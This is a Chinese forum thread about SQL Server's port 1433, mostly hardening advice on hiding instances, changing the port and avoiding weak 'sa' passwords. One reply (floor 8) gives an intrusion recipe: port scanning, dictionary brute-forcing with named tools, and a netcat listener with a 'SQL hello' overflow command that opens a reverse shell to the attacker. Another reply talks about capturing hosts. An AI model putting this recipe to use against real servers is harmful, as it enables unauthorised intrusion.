【IT】1433端口 (8/356)

< 上一篇下一篇 >
本帖地址: 复制地址

修改 回帖 引用 楼主: か鈊ゾ烦|ツ

用户形象图片

什么是1433端口
  1433端口,是SQL Server默认的端口,SQL Server服务使用两个端口:TCP-1433、UDP-1434。其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。
  很多人都说SQL Server配置的时候要把1433端口改变,这样别人就不能很容易地知道使用的什么端口了。可惜,通过微软未公开的1434端口的UDP探测可以很容易的知道SQL Server使用了什么TCP/IP端口。
  不过微软还是考虑到了这个问题,毕竟公开而且开放的端口会引起不必要的麻烦。在实例属性中选择TCP/IP协议的属性。选择隐藏 SQL Server 实例。如果隐藏了 SQL Server 实例,则将禁止对试图枚举网络上现有的 SQL Server 实例的客户端所发出的广播作出响应。这样,别人就不能用1434来探测你的TCP/IP端口了(除非用Port Scan)。
  1433端口存在的不安全因素
  1433端口不是很安全,往往很容易被黑客攻陷,因此,更改SQL Server 默认的1433端口是很有必要的。现在网上存在很多抓1433端口肉鸡的动画。而他们利用的往往是sa弱口令,因此要注意把sa密码设置得复杂一些,而且在conn等数据库链接文件中不要使用sa用户进行数据库连接。

  另外1433端口,如果仅仅是本机web链接本机数据库,那么没必要开1433,它是远程链接使用的。

 

                                                             IT聯盟→黑鹰

回到帖子顶部

回帖 引用 1楼初吻献给奶嘴

用户形象图片

端口,貌似很深奥。不明白~~~
回到帖子顶部

回帖 引用 2楼出售此Q号~~

用户形象图片

同意!!同意!!同意!!同意!!看不明白- -
回到帖子顶部

回帖 引用 3楼╳灬痴痴滴ぴ

用户形象图片

哈哈哈.....等哈去实验去。嘿嘿....
回到帖子顶部

回帖 引用 4楼˙_____J。

用户形象图片

http://baike.baidu.com/view/1400641.html?wtp=tt
回到帖子顶部

回帖 引用 5楼˙_____J。

用户形象图片

老兄,看看百度吧




 什么是1433端口
  1433端口,是SQL Server默认的端口,SQL Server服务使用两个端口:TCP-1433、UDP-1434。其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。
  很多人都说SQL Server配置的时候要把1433端口改变,这样别人就不能很容易地知道使用的什么端口了。可惜,通过微软未公开的1434端口的UDP探测可以很容易的知道SQL Server使用了什么TCP/IP端口。 
  不过微软还是考虑到了这个问题,毕竟公开而且开放的端口会引起不必要的麻烦。在实例属性中选择TCP/IP协议的属性。选择隐藏 SQL Server 实例。如果隐藏了 SQL Server 实例,则将禁止对试图枚举网络上现有的 SQL Server 实例的客户端所发出的广播作出响应。这样,别人就不能用1434来探测你的TCP/IP端口了(除非用Port Scan)。
  1433端口存在的不安全因素
  1433端口不是很安全,往往很容易被黑客攻陷,因此,更改SQL Server 默认的1433端口是很有必要的。现在网上存在很多抓1433端口肉鸡的动画。而他们利用的往往是sa弱口令,因此要注意把sa密码设置得复杂一些,而且在conn等数据库链接文件中不要使用sa用户进行数据库连接。
  另外1433端口,如果仅仅是本机web链接本机数据库,那么没必要开1433,它是远程链接使用的。


百度百科中的词条内容仅供参考,如果您需要解决具体问题
(尤其在法律、医学等领域),建议您咨询相关领域专业人士。 本词条对我有帮助
31
 
扩展阅读: 
1.1.http://www.hack79.com/viewthread.php?tid=5096 
2.2.http://iask.sina.com.cn/b/9346916.html?from=related 
3.3.http://www.admin023.cn/catalog.asp?tags=1433%E7%AB%AF%E5%8F%A3&page=1 

回到帖子顶部

回帖 引用 6楼雨γ^ō^γ泽

用户形象图片

刚才扫了一下,发现好多1433端口
回到帖子顶部

回帖 引用 7楼⑥月Deㄚǔ

用户形象图片

1433可以用来抓*** ***
回到帖子顶部

回帖 引用 8楼破鳥瞎JB飛

用户形象图片

1. 1433端口入侵

  scanport.exe 查有1433的机器

  SQLScanPass.exe 进行字典暴破(字典是关键)

  最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

  nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
 以上反响测试成功  
回到帖子顶部
个人信息
  • 荣誉+3
  • 荣誉+2
  • 荣誉+1
  • 荣誉-1
  • 荣誉-2
  • 荣誉-3
发表留言
  • 文章不错!
  • 精华好文!
  • 支持原创文章!
  • 帖子图文并茂,好!
  • 真知灼见,说得好!
  • 恶意广告
  • 违规内容
  • 严重灌水
  • 重复发帖
  • 标题党
你确定要删除此楼层吗
扣20点经验值

快速回复进入高级回复

插入图片 选择表情

验证码 看不清?换一张(不区分大小写)

[完成后按Ctrl+Enter发表]
[回复须知]